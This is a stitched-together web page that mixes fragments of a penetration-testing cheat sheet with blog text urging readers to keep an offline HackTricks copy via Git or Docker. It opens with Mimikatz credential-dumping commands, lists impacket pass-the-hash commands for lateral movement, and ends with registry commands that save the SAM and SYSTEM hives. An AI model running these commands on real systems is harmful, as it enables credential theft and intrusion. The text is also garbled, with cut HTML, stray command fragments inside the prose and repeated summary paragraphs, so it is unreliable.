privilege::debug sekurlsa::logonpasswords lsadump::sam</code></pre> </section>
<!-- Lateral Movement -->
<section id="lateral">
<h2>🕸️ Lateral Movement</h2>
<h3>Pass-the-Hash (Windows)</h3>
<pre><code># Using impacket
python wmiexec.py -hashes LM:NTLM user@target python psexec.py -hashes LM:NTLM user@target python smbexec.py -hashes LM:NTLM user@target
For advanced users who want to keep their system clean and update easily, Docker is the answer. You can run a container that hosts the latest markdown files with a search engine.
There is a community project that compiles HackTricks into a searchable static site. A typical run command looks like this: hacktricks offline
docker run -d -p 80:80 --name hacktricks-offline carlospolop/hacktricks-web
(Check Docker Hub for the most up-to-date image). This spins up a local web server that looks identical to the online version.
Websites change. Community edits are frequent. By maintaining a dedicated offline snapshot, you know exactly which commands work because you tested them against that specific version. You avoid the risk of landing on a page that was updated 20 minutes ago with untested syntax.
rg -i "mount -t cifs"
The difference between a junior analyst and a senior penetration tester is often preparation. When the network drops, the junior panics. The senior reaches for their hacktricks offline environment. python wmiexec
By cloning the repository, building the static site, spinning up a local Docker container, or even just saving a mirrored Wget archive, you ensure that you always have the world’s best cybersecurity encyclopedia at your fingertips.
Don't wait until you are sitting in a cold server room at 2:00 AM with a blinking cursor and no answer. Build your offline copy today. The internet is a luxury; knowledge is essential.
Ready to go dark? Clone the repo, build the site, and never fear the air gap again. (Check Docker Hub for the most up-to-date image)
Accessing HackTricks offline is best accomplished by cloning the official GitBook repository and running it locally via Docker, ensuring access to updated documentation. Alternatively, users can generate PDFs using GitBook CLI tools or save specific sections using browser extensions, though a full site scrape is not recommended. For the full guide and repository, visit HackTricks on GitHub. HackTricks - GitHub
HackTricks can be accessed offline primarily through the official GitHub repository by cloning the markdown files, allowing for local search via tools like Obsidian or by generating PDFs. Community-driven methods also exist for creating local mirrors, which are essential for secure, restricted-internet environments, though they require regular updates to avoid content decay. For more information, visit the HackTricks GitHub repository at GitHub.
reg save HKLM\SAM sam.save reg save HKLM\SYSTEM system.save